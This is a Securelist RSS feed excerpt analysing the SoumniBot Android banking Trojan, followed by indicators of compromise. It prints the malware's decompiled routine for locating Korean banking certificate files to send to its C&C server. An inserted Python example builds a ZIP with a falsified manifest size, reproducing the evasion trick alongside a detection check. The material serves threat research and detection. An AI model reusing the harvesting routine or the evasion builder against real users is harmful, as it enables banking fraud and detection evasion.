  1580. <a href="https://opentip.kaspersky.com/996c4f78a13a8831742e86c052f19c20/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">996c4f78a13a8831742e86c052f19c20</a><br />
  1582. <a href="https://opentip.kaspersky.com/91472c23ef5e8b0f8dda5fa9ae9afa94/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">91472c23ef5e8b0f8dda5fa9ae9afa94</a><br />
  1583. <a href="https://opentip.kaspersky.com/135abd6f35721298cc656a29492be255/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">135abd6f35721298cc656a29492be255</a><br />
  1584. <a href="https://opentip.kaspersky.com/db786b773cd75483a122b72fdc392af6/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">db786b773cd75483a122b72fdc392af6</a></p>
  1585. <p><strong>Domains and IPs </strong><br />
  1586. <a href="https://opentip.kaspersky.com/Commonline.space/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">commonline[.]space</a><br />
  1587. <a href="https://opentip.kaspersky.com/g1sea23g.commonline.space/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">g1sea23g.commonline[.]space</a><br />
  1588. <a href="https://opentip.kaspersky.com/tg1sea23g.commonline.space/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">tg1sea23g.commonline[.]space</a><br />
  1589. <a href="https://opentip.kaspersky.com/telemetry.commonline.space/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">telemetry.commonline[.]space</a><br />
  1590. <a href="https://opentip.kaspersky.com/e1awq1lp.commonline.space/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">e1awq1lp.commonline[.]space</a><br />
  1591. <a href="https://opentip.kaspersky.com/mc.commonline.space/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">mc.commonline[.]space</a><br />
  1592. <a href="https://opentip.kaspersky.com/userfeedsync.com/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">userfeedsync[.]com</a><br />
  1593. <a href="https://opentip.kaspersky.com/Service.userfeedsync.com/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">service.userfeedsync[.]com</a><br />
  1594. <a href="https://opentip.kaspersky.com/telemetry.userfeedsync.com/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">telemetry.userfeedsync[.]com</a></p>
  1595. ]]></content:encoded>
  1596. <wfw:commentRss>https://securelist.com/dunequixote/112425/feed/</wfw:commentRss>
  1597. <slash:comments>0</slash:comments>
  1598. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17203837/sl-dunequijote-apt-featured.jpg" width="1200" height="754"><media:keywords>full</media:keywords></media:content>
  1599. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17203837/sl-dunequijote-apt-featured-1024x643.jpg" width="1024" height="643"><media:keywords>large</media:keywords></media:content>
  1600. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17203837/sl-dunequijote-apt-featured-300x189.jpg" width="300" height="189"><media:keywords>medium</media:keywords></media:content>
  1601. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/17203837/sl-dunequijote-apt-featured-150x150.jpg" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content>
  1602. </item>
  1603. <item>
  1604. <title>SoumniBot: the new Android banker&#8217;s unique techniques</title>
  1605. <link>https://securelist.com/soumnibot-android-banker-obfuscates-app-manifest/112334/</link>
  1606. <comments>https://securelist.com/soumnibot-android-banker-obfuscates-app-manifest/112334/#comments</comments>
  1607. <dc:creator><![CDATA[Dmitry Kalinin]]></dc:creator>
  1608. <pubDate>Wed, 17 Apr 2024 10:00:28 +0000</pubDate>
  1609. <category><![CDATA[Malware descriptions]]></category>
  1610. <category><![CDATA[Google Android]]></category>
  1611. <category><![CDATA[Malware]]></category>
  1612. <category><![CDATA[Malware Descriptions]]></category>
  1613. <category><![CDATA[Malware Technologies]]></category>
  1614. <category><![CDATA[Mobile Malware]]></category>
  1615. <category><![CDATA[Trojan]]></category>
  1616. <category><![CDATA[Trojan Banker]]></category>
  1617. <category><![CDATA[Financial threats]]></category>
  1618. <category><![CDATA[Mobile threats]]></category>
  1619. <guid isPermaLink="false">https://kasperskycontenthub.com/securelist/?p=112334</guid>
  1620.  
  1621. <description><![CDATA[We review the new mobile Trojan banker SoumniBot, which exploits bugs in the Android manifest parser to dodge analysis and detection.]]></description>
  1622. <content:encoded><![CDATA[<p><img width="990" height="400" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/04/07155410/sl-abstract-mobile-phone-malware-danger-blue-red-binary-code-1-990x400.jpg" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><p>The creators of widespread malware programs often employ various tools that hinder code detection and analysis, and Android malware is no exception. As an example of this, droppers, such as Badpack and Hqwar, designed for stealthily delivering Trojan bankers or spyware to smartphones, are very popular among malicious actors who attack mobile devices. That said, we recently discovered a new banker, SoumniBot, which targets Korean users and is notable for an unconventional approach to evading analysis and detection, namely obfuscation of the Android manifest.</p>
  1623. <h2 id="soumnibot-obfuscation-exploiting-bugs-in-the-android-manifest-extraction-and-parsing-procedure">SoumniBot obfuscation: exploiting bugs in the Android manifest extraction and parsing procedure</h2>
  1624. <p>Any APK file is a ZIP archive with AndroidManifest.xml in the root folder. This file contains information about the declared components, permissions and other app data, and helps the operating system to retrieve information about various app entry points. Just like the operating system, the analyst starts by inspecting the manifest to find the entry points, which is where code analysis should start. This is likely what motivated the developers of SoumniBot to research the implementation of the manifest parsing and extraction routine, where they found several interesting opportunities to obfuscate APKs.</p>
  1625. <h3 id="technique-1-invalid-compression-method-value">Technique 1: Invalid Compression method value</h3>
  1626. <p>This is a <a href="https://krebsonsecurity.com/2023/08/how-malicious-android-apps-slip-into-disguise/" target="_blank" rel="noopener">relatively well-known technique</a> used by various types of malware including SoumniBot and associated with the way manifests are unpacked. In the <em>libziparchive</em> library, the standard unarchiving function permits only two <em>Compression method</em> values in the record header: 0x0000 (STORED, that is uncompressed) and 0x0008 (DEFLATED, that is compressed with <em>deflate</em> from the <em>zlib</em> library), or else it returns an error.</p>
  1627. <div id="attachment_112415" style="width: 749px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/16180619/SoumniBot-01.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112415" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/16180619/SoumniBot-01.png" alt="libziparchive unarchiving algorithm" width="739" height="498" class="size-full wp-image-112415" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/16180619/SoumniBot-01.png 739w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/16180619/SoumniBot-01-300x202.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/16180619/SoumniBot-01-519x350.png 519w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/16180619/SoumniBot-01-416x280.png 416w" sizes="(max-width: 739px) 100vw, 739px" /></a><p id="caption-attachment-112415" class="wp-caption-text">libziparchive unarchiving algorithm</p></div>
  1628. <p>Yet, instead of using this function, the developers of Android chose to implement an alternate scenario, where the value of the <em>Compression method</em> field is validated incorrectly.</p>
  1629. <div id="attachment_112416" style="width: 761px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/16180659/SoumniBot-02.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112416" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/16180659/SoumniBot-02.png" alt="Manifest extraction procedure" width="751" height="693" class="size-full wp-image-112416" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/16180659/SoumniBot-02.png 751w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/16180659/SoumniBot-02-300x277.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/16180659/SoumniBot-02-379x350.png 379w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/16180659/SoumniBot-02-740x683.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/16180659/SoumniBot-02-303x280.png 303w" sizes="(max-width: 751px) 100vw, 751px" /></a><p id="caption-attachment-112416" class="wp-caption-text">Manifest extraction procedure</p></div>
  1630. <p>If the APK parser comes across any <em>Compression method</em> value but 0x0008 (DEFLATED) in the APK for the AndroidManifest.xml entry, it considers the data uncompressed. This allows app developers to put any value except 8 into <em>Compression method</em> and write uncompressed data. Although any unpacker that correctly implements compression method validation would consider a manifest like that invalid, the Android APK parser recognizes it correctly and allows the application to be installed. The image below illustrates the way the technique is executed in the file <a href="https://opentip.kaspersky.com/b456430b4ed0879271e6164a7c0e4f6e/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">b456430b4ed0879271e6164a7c0e4f6e</a>.</p>
  1631. <div id="attachment_112417" style="width: 630px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/16180905/SoumniBot-03.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112417" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/16180905/SoumniBot-03.png" alt="Invalid Compression method value followed by uncompressed data" width="620" height="617" class="size-full wp-image-112417" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/16180905/SoumniBot-03.png 620w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/16180905/SoumniBot-03-300x300.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/16180905/SoumniBot-03-150x150.png 150w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/16180905/SoumniBot-03-352x350.png 352w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/16180905/SoumniBot-03-281x280.png 281w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/16180905/SoumniBot-03-50x50.png 50w" sizes="(max-width: 620px) 100vw, 620px" /></a><p id="caption-attachment-112417" class="wp-caption-text">Invalid Compression method value followed by uncompressed data</p></div>
  1632. <h3 id="technique-2-invalid-manifest-size">Technique 2: Invalid manifest size</h3>
  1633. <p>Let&#8217;s use the file <a href="https://opentip.kaspersky.com/0318b7b906e9a34427bf6bbcf64b6fc8/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">0318b7b906e9a34427bf6bbcf64b6fc8</a> as an example to review the essence of this technique. The header of the AndroidManifest.xml entry inside the ZIP archive states the size of the manifest file. If the entry is stored uncompressed, it will be copied from the archive unchanged, even if its size is stated incorrectly. The manifest parser ignores any overlay, that is, information following the payload that is unrelated to the manifest. The malware takes advantage of this: the stated size of the archived manifest exceeds its actual size, which results in an overlay, with some of the archive content being appended to the unpacked manifest. Stricter manifest parsers wouldn&#8217;t be able to read a file like that, whereas the Android parser handles the invalid manifest without any errors.</p>
  1634. <div id="attachment_112418" style="width: 617px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/16181145/SoumniBot-04.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112418" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/16181145/SoumniBot-04.png" alt="The stated size of the manifest is much larger than its actual size" width="607" height="482" class="size-full wp-image-112418" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/16181145/SoumniBot-04.png 607w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/16181145/SoumniBot-04-300x238.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/16181145/SoumniBot-04-441x350.png 441w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/16181145/SoumniBot-04-353x280.png 353w" sizes="(max-width: 607px) 100vw, 607px" /></a><p id="caption-attachment-112418" class="wp-caption-text">The stated size of the manifest is much larger than its actual size</p></div>
  1635. <p>Note that although live devices interpret these files as valid, <a href="https://developer.android.com/studio/debug/apk-analyzer" target="_blank" rel="noopener">apkanalyzer</a>, Google&#8217;s own official utility for analyzing assembled APKs, cannot handle them. We have notified Google accordingly.</p>
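<p>To make the size mismatch concrete, here is an added Python example; it is not part of the original article and not Kaspersky&#8217;s tooling. It hand-builds a two-entry, stored-only ZIP around a stand-in manifest, lies about the manifest entry&#8217;s size the way the sample does, and then compares what a lenient extractor hands to the manifest parser with what a strict ZIP reader does. The manifest is only an AXML chunk header plus filler, constructed for the test; the overlay check relies on the fact that the binary XML header carries its own chunkSize, so any declared bytes beyond it are overlay.</p>

```python
import io
import struct
import zipfile
import zlib

AXML_TYPE = 0x0003                   # RES_XML_TYPE: first chunk of every binary AndroidManifest.xml
LOCAL_HDR = "<4sHHHHHIIIHH"          # ZIP local file header (30 bytes)
CENTRAL_HDR = "<4sHHHHHHIIIHHHHHII"  # ZIP central directory entry (46 bytes)
EOCD = "<4sHHHHIIH"                  # end of central directory record (22 bytes)


def make_fake_manifest(body_len=40):
    """Constructed stand-in manifest: a genuine AXML chunk header (type, headerSize, chunkSize)
    followed by filler. chunkSize is the length the manifest parser believes the file has."""
    return struct.pack("<HHI", AXML_TYPE, 8, 8 + body_len) + b"\x00" * body_len


def build_apk(manifest, declared_size=None):
    """Hand-build a two-entry, STORED-only ZIP. declared_size, when given, overrides the
    manifest entry's size in the local header and the central directory, the article's trick:
    the bytes are copied unchanged, but more of them are claimed than the manifest occupies."""
    entries = [("AndroidManifest.xml", manifest, declared_size),
               ("classes.dex", b"dex\n035\x00" + b"\x00" * 64, None)]  # filler second entry
    local, central = bytearray(), bytearray()
    for name, payload, declared in entries:
        size = len(payload) if declared is None else declared
        crc = zlib.crc32(payload)  # CRC of the real payload, as a normal packer would write it
        name_b = name.encode("ascii")
        offset = len(local)
        local += struct.pack(LOCAL_HDR, b"PK\x03\x04", 20, 0, 0, 0, 0,
                             crc, size, size, len(name_b), 0) + name_b + payload
        central += struct.pack(CENTRAL_HDR, b"PK\x01\x02", 20, 20, 0, 0, 0, 0,
                               crc, size, size, len(name_b), 0, 0, 0, 0, 0, offset) + name_b
    eocd = struct.pack(EOCD, b"PK\x05\x06", 0, 0, len(entries), len(entries),
                       len(central), len(local), 0)
    return bytes(local + central + eocd)


def _central_entries(apk):
    """Walk the central directory, which is how Android's libziparchive locates entries."""
    eocd_off = apk.rfind(b"PK\x05\x06")
    _, _, _, _, count, _, pos, _ = struct.unpack_from(EOCD, apk, eocd_off)
    for _ in range(count):
        f = struct.unpack_from(CENTRAL_HDR, apk, pos)
        method, size, nlen, elen, clen, offset = f[4], f[9], f[10], f[11], f[12], f[16]
        name = apk[pos + 46:pos + 46 + nlen].decode("ascii", "replace")
        yield name, method, size, offset
        pos += 46 + nlen + elen + clen


def lenient_manifest(apk):
    """Copy the manifest out the way a lenient extractor does: exactly the declared number of
    bytes, straight from the archive, with no check that the claim is plausible."""
    for name, method, size, offset in _central_entries(apk):
        if name != "AndroidManifest.xml":
            continue
        if method != 0:
            raise ValueError("this example only handles STORED (method 0) entries")
        nlen, elen = struct.unpack_from(LOCAL_HDR, apk, offset)[9:11]
        start = offset + 30 + nlen + elen
        return apk[start:start + size]
    raise KeyError("AndroidManifest.xml not found")


def check_manifest_overlay(apk):
    """Triage check: the AXML header's own chunkSize is the manifest's true length, so any
    declared bytes beyond it are overlay. A positive overlay on a STORED entry is the
    signature of the technique described above."""
    blob = lenient_manifest(apk)
    chunk_type, _, chunk_size = struct.unpack_from("<HHI", blob, 0)
    return {"is_axml": chunk_type == AXML_TYPE, "declared": len(blob), "chunk_size": chunk_size,
            "overlay": len(blob) - chunk_size, "overlay_bytes": blob[chunk_size:]}


def strict_read(apk):
    """The same entry through a strict reader: Python's zipfile refuses it (CRC mismatch on
    older versions, overlapping-entry check on newer ones) and this helper returns None."""
    try:
        with zipfile.ZipFile(io.BytesIO(apk)) as zf:
            return zf.read("AndroidManifest.xml")
    except zipfile.BadZipFile:
        return None


if __name__ == "__main__":
    manifest = make_fake_manifest()
    for label, apk in (("honest", build_apk(manifest)),
                       ("padded", build_apk(manifest, declared_size=len(manifest) + 40))):
        r = check_manifest_overlay(apk)
        strict = "accepted" if strict_read(apk) is not None else "rejected"
        print(f"{label}: declared={r['declared']} axml_size={r['chunk_size']} "
              f"overlay={r['overlay']} strict_zip_reader={strict}")
```

<p>On the padded archive the overlay begins with the next entry&#8217;s local file header, which is exactly the unrelated archive content the text describes ending up inside the unpacked manifest. The same comparison of ZIP-declared size against the AXML chunkSize is a cheap check to run on any APK before trusting a third-party manifest dump.</p>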
  1636. <h3 id="technique-3-long-namespace-names">Technique 3: Long namespace names</h3>
  1637. <p>The SoumniBot malware family, for example the file <a href="https://opentip.kaspersky.com/fa8b1592c9cda268d8affb6bceb7a120/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">fa8b1592c9cda268d8affb6bceb7a120</a>, has used this technique as well. The manifest contains very long strings, used as the names of XML namespaces.</p>
  1638. <div id="attachment_112419" style="width: 1240px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/16181231/SoumniBot-05.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112419" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/16181231/SoumniBot-05.png" alt="Very long strings in the manifest…" width="1230" height="864" class="size-full wp-image-112419" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/16181231/SoumniBot-05.png 1230w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/16181231/SoumniBot-05-300x211.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/16181231/SoumniBot-05-1024x719.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/16181231/SoumniBot-05-768x539.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/16181231/SoumniBot-05-498x350.png 498w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/16181231/SoumniBot-05-740x520.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/16181231/SoumniBot-05-399x280.png 399w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/16181231/SoumniBot-05-800x562.png 800w" sizes="(max-width: 1230px) 100vw, 1230px" /></a><p id="caption-attachment-112419" class="wp-caption-text">Very long strings in the manifest…</p></div>
  1639. <div id="attachment_112420" style="width: 518px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/16181259/SoumniBot-06.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112420" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/16181259/SoumniBot-06.png" alt="…used as namespace names" width="508" height="69" class="size-full wp-image-112420" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/16181259/SoumniBot-06.png 508w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/16181259/SoumniBot-06-300x41.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/16181259/SoumniBot-06-500x69.png 500w" sizes="(max-width: 508px) 100vw, 508px" /></a><p id="caption-attachment-112420" class="wp-caption-text">…used as namespace names</p></div>
1640. <p>Manifests that contain strings like these are unreadable for humans, and programs that process them may fail to allocate enough memory. The manifest parser in the OS itself completely ignores namespaces, so the manifest is handled without errors.</p>
  1641. <h2 id="whats-under-the-obfuscation-soumnibots-functionality">What&#8217;s under the obfuscation: SoumniBot&#8217;s functionality</h2>
1642. <p>When started, the application requests a configuration with two parameters, mainsite and mqtt, from a server whose address is a hardcoded constant.</p>
  1643. <div id="attachment_112421" style="width: 459px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/16181415/SoumniBot-07.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112421" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/16181415/SoumniBot-07.png" alt="Parameter request" width="449" height="266" class="size-full wp-image-112421" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/16181415/SoumniBot-07.png 449w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/16181415/SoumniBot-07-300x178.png 300w" sizes="(max-width: 449px) 100vw, 449px" /></a><p id="caption-attachment-112421" class="wp-caption-text">Parameter request</p></div>
1644. <p>Both parameters are server addresses that the malware needs to function. The mainsite server receives collected data, and mqtt provides MQTT messaging for receiving commands. If the configuration server does not return these parameters for some reason, the application falls back to default addresses that are also stored in the code.</p>
  1645. <p>After requesting the parameters, the application starts a malicious service. If it cannot start or stops for some reason, a new attempt is made every 16 minutes. When run for the first time, the Trojan hides the app icon to complicate removal, and then starts to upload data in the background from the victim&#8217;s device to mainsite every 15 seconds. The data includes the IP address, country deduced from that, contact and account lists, SMS and MMS messages, and the victim&#8217;s ID generated with the help of the <a href="https://github.com/trustdecision/trustdevice-android" target="_blank" rel="noopener">trustdevice-android</a> library. The Trojan also subscribes to messages from the MQTT server to receive the commands described below.</p>
  1646. <table width="100%">
  1647. <tbody>
  1648. <tr>
  1649. <td style="text-align: center" width="10%"><strong>#</strong></td>
  1650. <td style="text-align: center" width="50%"><strong>Description</strong></td>
  1651. <td style="text-align: center" width="40%"><strong>Parameters</strong></td>
  1652. </tr>
  1653. <tr>
  1654. <td style="text-align: center">0</td>
  1655. <td>Sends information about the infected device: phone number, carrier, etc., and the Trojan version, followed by all of the victim&#8217;s SMS messages, contacts, accounts, photos, videos and online banking digital certificates.</td>
  1656. <td>&#8211;</td>
  1657. </tr>
  1658. <tr>
  1659. <td style="text-align: center">1</td>
  1660. <td>Sends the victim&#8217;s contact list.</td>
  1661. <td>&#8211;</td>
  1662. </tr>
  1663. <tr>
  1664. <td style="text-align: center">2</td>
  1665. <td>Deletes a contact on the victim&#8217;s device.</td>
  1666. <td><em>data</em>: the name of the contact to delete</td>
  1667. </tr>
  1668. <tr>
  1669. <td style="text-align: center">3</td>
  1670. <td>Sends the victim&#8217;s SMS and MMS messages.</td>
  1671. <td>&#8211;</td>
  1672. </tr>
  1673. <tr>
  1674. <td style="text-align: center">4</td>
  1675. <td>A debugging command likely to be replaced with sending call logs in a new version.</td>
  1676. <td>&#8211;</td>
  1677. </tr>
  1678. <tr>
  1679. <td style="text-align: center">5</td>
  1680. <td>Sends the victim&#8217;s photos and videos.</td>
  1681. <td>&#8211;</td>
  1682. </tr>
  1683. <tr>
  1684. <td style="text-align: center">8</td>
  1685. <td>Sends an SMS message.</td>
  1686. <td><em>data</em>: ID that the malware uses to receive a message to forward. The Trojan sends the ID to mainsite and gets message text in return.</td>
  1687. </tr>
  1688. <tr>
  1689. <td style="text-align: center">24</td>
  1690. <td>Sends a list of installed apps.</td>
  1691. <td>&#8211;</td>
  1692. </tr>
  1693. <tr>
  1694. <td style="text-align: center">30</td>
  1695. <td>Adds a new contact on the device.</td>
  1696. <td><em>name</em>: contact name; <em>phoneNum</em>: phone number</td>
  1697. </tr>
  1698. <tr>
  1699. <td style="text-align: center">41</td>
  1700. <td>Gets ringtone volume levels.</td>
  1701. <td>&#8211;</td>
  1702. </tr>
  1703. <tr>
  1704. <td style="text-align: center">42</td>
  1705. <td>Turns silent mode on or off.</td>
  1706. <td><em>data</em>: a flag set to 1 to turn on silent mode and to 0 to turn it off</td>
  1707. </tr>
  1708. <tr>
  1709. <td style="text-align: center">99</td>
  1710. <td>Sends a <em>pong</em> message in response to an MQTT ping request.</td>
  1711. <td>&#8211;</td>
  1712. </tr>
  1713. <tr>
  1714. <td style="text-align: center">100</td>
  1715. <td>Turns on debug mode.</td>
  1716. <td>&#8211;</td>
  1717. </tr>
  1718. <tr>
  1719. <td style="text-align: center">101</td>
  1720. <td>Turns off debug mode.</td>
  1721. <td>&#8211;</td>
  1722. </tr>
  1723. </tbody>
  1724. </table>
1725. <p>The command with the number 0 is worth special mention. It searches, among other things, external storage media for .key and .der files whose paths contain /NPKI/yessign.</p><pre class="crayon-plain-tag">import java.util.ArrayList;
import java.util.List;

import android.content.Context;
import android.database.Cursor;
import android.provider.MediaStore;

// Decompiled from the sample: queries MediaStore for key files on external storage
// and keeps only the first one located under an /NPKI/yessign directory.
public static List&lt;String&gt; getAllBankingKeys(Context context) {
    List&lt;String&gt; list = new ArrayList&lt;&gt;();
    Cursor cursor = context.getContentResolver().query(MediaStore.Files.getContentUri("external"),
            new String[]{"_id", "mime_type", "_size", "date_modified", "_data"},
            "(_data LIKE '%.key' OR _data LIKE '%.der')", null, null);
    int index = cursor == null ? 0 : cursor.getColumnIndexOrThrow("_data");
    if (cursor != null) {
        while (cursor.moveToNext()) {
            String s = cursor.getString(index);
            if (!s.contains("/NPKI/yessign")) {
                continue;
            }
            Logger.log("path is:" + s);   // the sample's own logging helper
            list.add(s);
            break;                        // stops at the first matching path
        }
        cursor.close();
    }
    return list;
}</pre><p>
1745. If the application finds such files, it packs the directory containing them into a ZIP archive and sends it to the C&#038;C server. These files are digital certificates issued by Korean banks to their clients and used for signing in to online banking services or confirming banking transactions. This technique is quite uncommon for Android banking malware. Kaspersky security solutions detect SoumniBot despite its obfuscation techniques and assign it the verdict Trojan-Banker.AndroidOS.SoumniBot.</p>
  1746. <h2 id="conclusion">Conclusion</h2>
1747. <p>Malware creators seek to maximize the number of devices they infect without being noticed. This motivates them to look for new ways of complicating detection. The developers of SoumniBot unfortunately succeeded because of insufficiently strict validation in the Android manifest parser.</p>
  1748. <p>We have detailed the techniques used by this Trojan, so that researchers around the world are aware of the tactics, which other types of malware might borrow in the future. Besides the unconventional obfuscation, SoumniBot is notable for stealing Korean online banking keys, which we rarely observe in Android bankers. This feature lets malicious actors empty unwitting victims&#8217; wallets and circumvent authentication methods used by banks. To avoid becoming a victim of malware like that, we recommend using a reliable security solution on your smartphone to detect the Trojan and prevent it from being installed despite all its tricks.</p>
  1749. <h2 id="indicators-of-compromise">Indicators of compromise</h2>
  1750. <p><strong>MD5</strong><br />
  1751. <a href="https://opentip.kaspersky.com/0318b7b906e9a34427bf6bbcf64b6fc8/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">0318b7b906e9a34427bf6bbcf64b6fc8</a><br />
  1752. <a href="https://opentip.kaspersky.com/00aa9900205771b8c9e7927153b77cf2/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">00aa9900205771b8c9e7927153b77cf2</a><br />
  1753. <a href="https://opentip.kaspersky.com/b456430b4ed0879271e6164a7c0e4f6e/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">b456430b4ed0879271e6164a7c0e4f6e</a><br />
  1754. <a href="https://opentip.kaspersky.com/fa8b1592c9cda268d8affb6bceb7a120/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">fa8b1592c9cda268d8affb6bceb7a120</a></p>
  1755. <p><strong>C&amp;C</strong><br />
  1756. <a href="https://opentip.kaspersky.com/https:/google.kt9.site/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">https[://]google.kt9[.]site</a><br />
  1757. <a href="https://opentip.kaspersky.com/https:/dbdb.addea.workers.dev/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">https[://]dbdb.addea.workers[.]dev</a></p>
  1758. ]]></content:encoded>
  1759. <wfw:commentRss>https://securelist.com/soumnibot-android-banker-obfuscates-app-manifest/112334/feed/</wfw:commentRss>
  1760. <slash:comments>1</slash:comments>
  1761. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/04/07155410/sl-abstract-mobile-phone-malware-danger-blue-red-binary-code-1.jpg" width="1885" height="1060"><media:keywords>full</media:keywords></media:content>
  1762. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/04/07155410/sl-abstract-mobile-phone-malware-danger-blue-red-binary-code-1-1024x576.jpg" width="1024" height="576"><media:keywords>large</media:keywords></media:content>
  1763. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/04/07155410/sl-abstract-mobile-phone-malware-danger-blue-red-binary-code-1-300x169.jpg" width="300" height="169"><media:keywords>medium</media:keywords></media:content>
